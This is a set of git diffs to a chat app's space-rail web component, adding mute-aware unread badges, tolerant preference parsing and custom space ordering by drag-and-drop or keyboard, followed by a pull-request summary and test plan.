+          class="context-menu-item mute-toggle"
+          @click=${() => void this.handleToggleMute(thread, projectId)}
+        >
+          <sl-icon name=${thread.muted ? 'bell' : 'bell-slash'}></sl-icon>
+          ${thread.muted ? 'Unmute' : 'Mute'}
         </div>
         ${!thread.isGeneral
           ? html`

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -1007,9 +1007,12 @@ export class ScionChatSpaceRail extends LitElement {
   private async handleMarkSpaceRead(projectId: string): Promise<void> {
     this.contextMenuTarget = null;
     try {
-      await apiFetch(`/api/v1/chat/spaces/${encodeURIComponent(projectId)}/read`, {
+      const res = await apiFetch(`/api/v1/chat/spaces/${encodeURIComponent(projectId)}/read`, {
         method: 'POST',
       });
+      // A refused request leaves every watermark where it was, so clearing the
+      // dots here would show the space as read until the next reload (#1029).
+      if (!res.ok) return;
       // Update all threads in this space locally
       const threads = this.threadsBySpace.get(projectId) || [];
       const newMap = new Map(this.threadsBySpace);

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -935,9 +935,11 @@ export class ScionChatSpaceRail extends LitElement {
         }
       );
       if (!res.ok) return;
-      // Update locally
+      // Update locally. A muted thread was never in the space badge (the
+      // server's rollup skips it), so taking one off for it would eat another
+      // thread's unread.
       this.updateThread(projectId, thread.id, { hasUnread: false, hasUnreadMention: false });
-      this.decrementSpaceUnread(projectId);
+      if (!thread.muted) this.adjustSpaceUnread(projectId, -1);
     } catch {
       // Non-critical
     }
@@ -953,16 +955,29 @@ export class ScionChatSpaceRail extends LitElement {
       const target = threads.find((t) => t.id === threadId);
       if (!target || (!target.hasUnread && !target.hasUnreadMention)) continue;
       this.updateThread(projectId, threadId, { hasUnread: false, hasUnreadMention: false });
-      this.decrementSpaceUnread(projectId);
+      if (!target.muted) this.adjustSpaceUnread(projectId, -1);
       return;
     }
   }
 
-  /** Drop one from a space's unread badge, floored at zero. */
-  private decrementSpaceUnread(projectId: string): void {
+  /** Nudge a space's unread badge, floored at zero. */
+  private adjustSpaceUnread(projectId: string, delta: number): void {
     this.spaces = this.spaces.map((s) =>
-      s.projectId === projectId ? { ...s, unreadCount: Math.max(0, s.unreadCount - 1) } : s
+      s.projectId === projectId ? { ...s, unreadCount: Math.max(0, s.unreadCount + delta) } : s
     );
+  }
+
+  /**
+   * Apply a mute decision locally, keeping the space badge in step with it.
+   * The server's rollup does not count muted threads, so an unread thread
+   * leaves the badge when it is muted and rejoins it when it is unmuted —
+   * without this the badge only tells the truth again after a reload.
+   */
+  private setThreadMuted(projectId: string, threadId: string, muted: boolean): void {
+    const target = (this.threadsBySpace.get(projectId) || []).find((t) => t.id === threadId);
+    if (!target || (target.muted === true) === muted) return;
+    this.updateThread(projectId, threadId, { muted });
+    if (target.hasUnread) this.adjustSpaceUnread(projectId, muted ? -1 : 1);
   }
 
   private async handleMarkSpaceRead(projectId: string): Promise<void> {
@@ -1022,7 +1037,7 @@ export class ScionChatSpaceRail extends LitElement {
   private async handleToggleMute(thread: ChatSpaceThread, projectId: string): Promise<void> {
     this.contextMenuTarget = null;
     const next = !thread.muted;
-    this.updateThread(projectId, thread.id, { muted: next });
+    this.setThreadMuted(projectId, thread.id, next);
     try {
       const res = await apiFetch(
         `/api/v1/chat/conversations/${encodeURIComponent(thread.id)}/mute`,
@@ -1033,15 +1048,15 @@ export class ScionChatSpaceRail extends LitElement {
         }
       );
       if (!res.ok) {
-        this.updateThread(projectId, thread.id, { muted: thread.muted === true });
+        this.setThreadMuted(projectId, thread.id, thread.muted === true);
         return;
       }
       const data = (await res.json().catch(() => ({}))) as { muted?: boolean };
       if (typeof data.muted === 'boolean' && data.muted !== next) {
-        this.updateThread(projectId, thread.id, { muted: data.muted });
+        this.setThreadMuted(projectId, thread.id, data.muted);
       }
     } catch {
-      this.updateThread(projectId, thread.id, { muted: thread.muted === true });
+      this.setThreadMuted(projectId, thread.id, thread.muted === true);
     }
   }
 

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -25,7 +25,7 @@
  * Data sources:
  *   - GET /api/v1/chat/spaces — visible spaces with unread rollup
  *   - GET /api/v1/chat/spaces/{projectId}/threads — threads per space
- *   - GET /api/v1/chat/prefs — user preferences (sort mode, custom order)
+ *   - GET /api/v1/chat/user-prefs — user preferences (sort mode, custom order)
  *
  * DMs are accessed via member-click in the members sidebar (chat-members).
  *
@@ -71,6 +71,38 @@ interface RailPrefs {
   spaceOrder: string[] | undefined;
 }
 
+/**
+ * Read a prefs payload from the server. `spaceOrder` is stored as a JSON array
+ * string, so a hand-edited or truncated value has to degrade to "no custom
+ * order" rather than throwing the rail's whole load away.
+ */
+function parseRailPrefs(payload: unknown): RailPrefs {
+  const data = (payload ?? {}) as {
+    spaceSortMode?: string;
+    threadSortMode?: string;
+    spaceOrder?: string;
+  };
+  let spaceOrder: string[] | undefined;
+  if (typeof data.spaceOrder === 'string' && data.spaceOrder !== '') {
+    try {
+      const parsed: unknown = JSON.parse(data.spaceOrder);
+      if (Array.isArray(parsed)) {
+        spaceOrder = parsed.filter((id): id is string => typeof id === 'string');
+      }
+    } catch {
+      spaceOrder = undefined;
+    }
+  }
+  const spaceSortMode = data.spaceSortMode;
+  const threadSortMode = data.threadSortMode;
+  return {
+    spaceSortMode:
+      spaceSortMode === 'alpha' || spaceSortMode === 'custom' ? spaceSortMode : 'activity',
+    threadSortMode: threadSortMode === 'alpha' ? 'alpha' : 'activity',
+    spaceOrder,
+  };
+}
+
 /** Viewport width at or below which the chat panels are separate screens. */
 const MOBILE_BREAKPOINT_PX = 768;
 
@@ -110,6 +142,10 @@ export class ScionChatSpaceRail extends LitElement {
   @state() private renameValue = '';
   /** Space filter: 'all' shows everything, 'unread' shows only spaces with unread. */
   @state() private spaceFilter: 'all' | 'unread' = 'all';
+  /** Project id of the space header currently being dragged, if any. */
+  @state() private draggingSpaceId: string | null = null;
+  /** Project id of the space header the drag is hovering over. */
+  @state() private dragOverSpaceId: string | null = null;
 
   static override styles = css`
     :host {
@@ -162,6 +198,16 @@ export class ScionChatSpaceRail extends LitElement {
 
     .space-header:hover {
       color: var(--scion-text, #1e293b);
+    }
+
+    /* Reorder affordances: the dragged header fades, the hovered one grows a
+       line marking where the drop lands. */
+    .space-header.dragging {
+      opacity: 0.4;
+    }
+
+    .space-header.drag-over {
+      box-shadow: inset 0 2px 0 0 var(--scion-primary, #3b82f6);
     }
 
     .space-header .chevron {
@@ -602,40 +648,41 @@ export class ScionChatSpaceRail extends LitElement {
 
   private async loadPrefs(): Promise<void> {
     try {
-      const res = await apiFetch('/api/v1/chat/prefs');
+      const res = await apiFetch('/api/v1/chat/user-prefs');
       if (res.ok) {
-        const data = (await res.json()) as {
-          space_sort_mode?: string;
-          thread_sort_mode?: string;
-          space_order?: string[];
-        };
-        this.prefs = {
-          spaceSortMode: (data.space_sort_mode as RailPrefs['spaceSortMode']) || 'activity',
-          threadSortMode: (data.thread_sort_mode as RailPrefs['threadSortMode']) || 'activity',
-          spaceOrder: data.space_order,
-        };
+        this.prefs = parseRailPrefs(await res.json());
       }
     } catch {
       // Use defaults
     }
   }
 
-  /** Save user preferences. Exposed for sort mode changes. */
+  /**
+   * Save user preferences. Applied locally first so the rail responds to the
+   * click, then reconciled with what the server actually stored — the server
+   * defaults blank modes, so its answer can differ from the request.
+   */
   async savePrefs(update: Partial<RailPrefs>): Promise<void> {
+    const previous = this.prefs;
     const newPrefs = { ...this.prefs, ...update };
     this.prefs = newPrefs;
     try {
-      await apiFetch('/api/v1/chat/prefs', {
+      const res = await apiFetch('/api/v1/chat/user-prefs', {
         method: 'PUT',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({
-          space_sort_mode: newPrefs.spaceSortMode,
-          thread_sort_mode: newPrefs.threadSortMode,
-          space_order: newPrefs.spaceOrder,
+          spaceSortMode: newPrefs.spaceSortMode,
+          threadSortMode: newPrefs.threadSortMode,
+          spaceOrder: JSON.stringify(newPrefs.spaceOrder ?? []),
         }),
       });
+      if (!res.ok) {
+        this.prefs = previous;
+        return;
+      }
+      this.prefs = parseRailPrefs(await res.json());
     } catch {
-      // Non-critical
+      this.prefs = previous;
     }
   }
 
@@ -674,6 +721,91 @@ export class ScionChatSpaceRail extends LitElement {
         break;
     }
     return spaces;
+  }
+
+  // ---------------------------------------------------------------------------
+  // Custom ordering
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Persist a new space order. Dragging or nudging a space is an unambiguous
+   * statement about where it belongs, so it switches the rail to custom sort
+   * rather than being refused in activity or alpha mode — the check moving to
+   * "Custom" in the sort menu is what tells the user the mode changed. The
+   * alternative (disabling the drag outside custom mode) would make the
+   * feature undiscoverable: you would have to know to pick Custom first, in a
+   * menu that gives no hint of what a custom order even is.
+   */
+  private async applySpaceOrder(order: string[]): Promise<void> {
+    await this.savePrefs({ spaceSortMode: 'custom', spaceOrder: order });
+  }
+
+  /** The order the user is currently looking at, as project ids. */
+  private currentSpaceOrder(): string[] {
+    return this.getSortedSpaces().map((s) => s.projectId);
+  }
+
+  /**
+   * Move a space one slot up (-1) or down (+1) in the displayed order. This is
+   * the keyboard-reachable half of reordering: drag-and-drop cannot be done
+   * without a pointer, and a rail only reorderable by mouse is not reorderable
+   * for everyone.
+   */
+  private async moveSpace(projectId: string, delta: -1 | 1): Promise<void> {
+    const order = this.currentSpaceOrder();
+    const from = order.indexOf(projectId);
+    const to = from + delta;
+    if (from === -1 || to < 0 || to >= order.length) return;
+    const next = [...order];
+    const [moved] = next.splice(from, 1);
+    next.splice(to, 0, moved);
+    await this.applySpaceOrder(next);
+  }
+
+  /** True when the space is already at the given end of the displayed order. */
+  private isSpaceAtEdge(projectId: string, edge: 'first' | 'last'): boolean {
+    const order = this.currentSpaceOrder();
+    const index = order.indexOf(projectId);
+    if (index === -1) return true;
+    return edge === 'first' ? index === 0 : index === order.length - 1;
+  }
+
+  private handleSpaceDragStart(e: DragEvent, projectId: string): void {
+    this.draggingSpaceId = projectId;
+    if (e.dataTransfer) {
+      e.dataTransfer.effectAllowed = 'move';
+      // Firefox ignores a drag that carries no data.
+      e.dataTransfer.setData('text/plain', projectId);
+    }
+  }
+
+  private handleSpaceDragOver(e: DragEvent, projectId: string): void {
+    if (!this.draggingSpaceId) return;
+    e.preventDefault();
+    if (e.dataTransfer) e.dataTransfer.dropEffect = 'move';
+    if (this.dragOverSpaceId !== projectId) this.dragOverSpaceId = projectId;
+  }
+
+  private async handleSpaceDrop(e: DragEvent, targetProjectId: string): Promise<void> {
+    e.preventDefault();
+    const sourceId = this.draggingSpaceId;
+    this.draggingSpaceId = null;
+    this.dragOverSpaceId = null;
+    if (!sourceId || sourceId === targetProjectId) return;
+
+    const order = this.currentSpaceOrder();
+    const from = order.indexOf(sourceId);
+    const to = order.indexOf(targetProjectId);
+    if (from === -1 || to === -1) return;
+    const next = [...order];
+    const [moved] = next.splice(from, 1);
+    next.splice(to, 0, moved);
+    await this.applySpaceOrder(next);
+  }
+
+  private handleSpaceDragEnd(): void {
+    this.draggingSpaceId = null;
+    this.dragOverSpaceId = null;
   }
 
   private getSpaceLastActivity(projectId: string): number {
@@ -1053,11 +1185,26 @@ export class ScionChatSpaceRail extends LitElement {
           ></sl-icon-button>
           <sl-menu @sl-select=${this.handleSortSelect}>
             <sl-menu-label>Sort spaces</sl-menu-label>
-            <sl-menu-item value="activity" ?checked=${this.prefs.spaceSortMode === 'activity'}>
+            <sl-menu-item
+              type="checkbox"
+              value="activity"
+              ?checked=${this.prefs.spaceSortMode === 'activity'}
+            >
               Recent activity
             </sl-menu-item>
-            <sl-menu-item value="alpha" ?checked=${this.prefs.spaceSortMode === 'alpha'}>
+            <sl-menu-item
+              type="checkbox"
+              value="alpha"
+              ?checked=${this.prefs.spaceSortMode === 'alpha'}
+            >
               Alphabetical
+            </sl-menu-item>
+            <sl-menu-item
+              type="checkbox"
+              value="custom"
+              ?checked=${this.prefs.spaceSortMode === 'custom'}
+            >
+              Custom
             </sl-menu-item>
           </sl-menu>
         </sl-dropdown>
@@ -1083,6 +1230,15 @@ export class ScionChatSpaceRail extends LitElement {
     const value = item?.getAttribute('value');
     if (value === 'activity' || value === 'alpha') {
       void this.savePrefs({ spaceSortMode: value });
+      return;
+    }
+    if (value === 'custom') {
+      // Switching to custom with no order saved yet freezes the order the user
+      // is currently looking at, so the list does not jump on the click.
+      void this.savePrefs({
+        spaceSortMode: 'custom',
+        spaceOrder: this.prefs.spaceOrder ?? this.getSortedSpaces().map((s) => s.projectId),
+      });
     }
   }
 
@@ -1115,7 +1271,15 @@ export class ScionChatSpaceRail extends LitElement {
     return html`
       <div class="space-section">
         <div
-          class="space-header"
+          class="space-header ${this.draggingSpaceId === space.projectId ? 'dragging' : ''} ${this
+            .dragOverSpaceId === space.projectId && this.draggingSpaceId !== space.projectId
+            ? 'drag-over'
+            : ''}"
+          draggable="true"
+          @dragstart=${(e: DragEvent) => this.handleSpaceDragStart(e, space.projectId)}
+          @dragover=${(e: DragEvent) => this.handleSpaceDragOver(e, space.projectId)}
+          @drop=${(e: DragEvent) => void this.handleSpaceDrop(e, space.projectId)}
+          @dragend=${() => this.handleSpaceDragEnd()}
           @click=${() =>
             isCollapsed
               ? this.handleCollapsedSpaceClick(space)
@@ -1141,12 +1305,33 @@ export class ScionChatSpaceRail extends LitElement {
                   const value = detail?.item?.getAttribute('value');
                   if (value === 'new-thread') {
                     this.startCreateThread(space.projectId);
+                  } else if (value === 'move-up') {
+                    void this.moveSpace(space.projectId, -1);
+                  } else if (value === 'move-down') {
+                    void this.moveSpace(space.projectId, 1);
                   }
                 }}
               >
                 <sl-menu-item value="new-thread">
                   <sl-icon slot="prefix" name="plus-lg"></sl-icon>
                   New thread
+                </sl-menu-item>
+                <sl-divider></sl-divider>
+                <sl-menu-item
+                  class="move-up"
+                  value="move-up"
+                  ?disabled=${this.isSpaceAtEdge(space.projectId, 'first')}
+                >
+                  <sl-icon slot="prefix" name="arrow-up"></sl-icon>
+                  Move up
+                </sl-menu-item>
+                <sl-menu-item
+                  class="move-down"
+                  value="move-down"
+                  ?disabled=${this.isSpaceAtEdge(space.projectId, 'last')}
+                >
+                  <sl-icon slot="prefix" name="arrow-down"></sl-icon>
+                  Move down
                 </sl-menu-item>
               </sl-menu>
             </sl-dropdown>

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -934,7 +934,9 @@ export class ScionChatSpaceRail extends LitElement {
     this.contextMenuPos = { x: e.clientX, y: e.clientY };
   }
 
-  private async handleMarkRead(thread: ChatSpaceThread, projectId: string): Promise<void> {
+  // _projectId is kept for the call site's symmetry with the other context-menu
+  // actions; markThreadRead finds the thread's space itself.
+  private async handleMarkRead(thread: ChatSpaceThread, _projectId: string): Promise<void> {
     this.contextMenuTarget = null;
     // The server requires the watermark to move to a specific message. Without
     // an ID it rejects the request, and the dot comes back on the next reload.
@@ -952,11 +954,11 @@ export class ScionChatSpaceRail extends LitElement {
         }
       );
       if (!res.ok) return;
-      // Update locally. A muted thread was never in the space badge (the
-      // server's rollup skips it), so taking one off for it would eat another
-      // thread's unread.
-      this.updateThread(projectId, thread.id, { hasUnread: false, hasUnreadMention: false });
-      if (!thread.muted) this.adjustSpaceUnread(projectId, -1);
+      // Update locally through the same helper the no-watermark path above
+      // uses. The badge arithmetic lives there and nowhere else: doing it
+      // inline here is how "Mark as read" on an already-read thread came to
+      // decrement the badge on every click (#1029).
+      this.markThreadRead(thread.id);
     } catch {
       // Non-critical
     }
@@ -965,7 +967,12 @@ export class ScionChatSpaceRail extends LitElement {
   /**
    * Clear a thread's unread markers without talking to the server. Called when
    * the thread view itself advanced the watermark — the rail has no other way
-   * to learn that happened.
+   * to learn that happened — and by "Mark as read" once the server has moved
+   * the watermark for it.
+   *
+   * The space badge is a server-side rollup of unread, unmuted threads, so a
+   * thread only leaves it if it was in it: an already-read thread and a muted
+   * one both take nothing off, or they would eat another thread's unread.
    */
   markThreadRead(threadId: string): void {
     for (const [projectId, threads] of this.threadsBySpace) {


### PR DESCRIPTION
## Summary
- Expose conversation mute via PUT endpoint and rail/DM-header UI controls (ptone/scion#1029)
- Expose thread pinning via PUT endpoint and context menu (ptone/scion#1030)
- Custom space ordering with dropdown mode selector, drag-and-drop, keyboard move (ptone/scion#1031)
- Expand attachment allow-list to 34 developer file types with per-file partial success (ptone/scion#1045)
- Fix orphaned-blob leak in attachment path (ptone/scion#1089)

## Test plan
- Mute endpoint and store round-trip tests
- Pin endpoint and sort-order verification
- Space ordering persistence via user prefs
- Attachment allow-list acceptance and rejection tests including security (HTML/SVG blocked)
- Partial success response with mixed valid/invalid files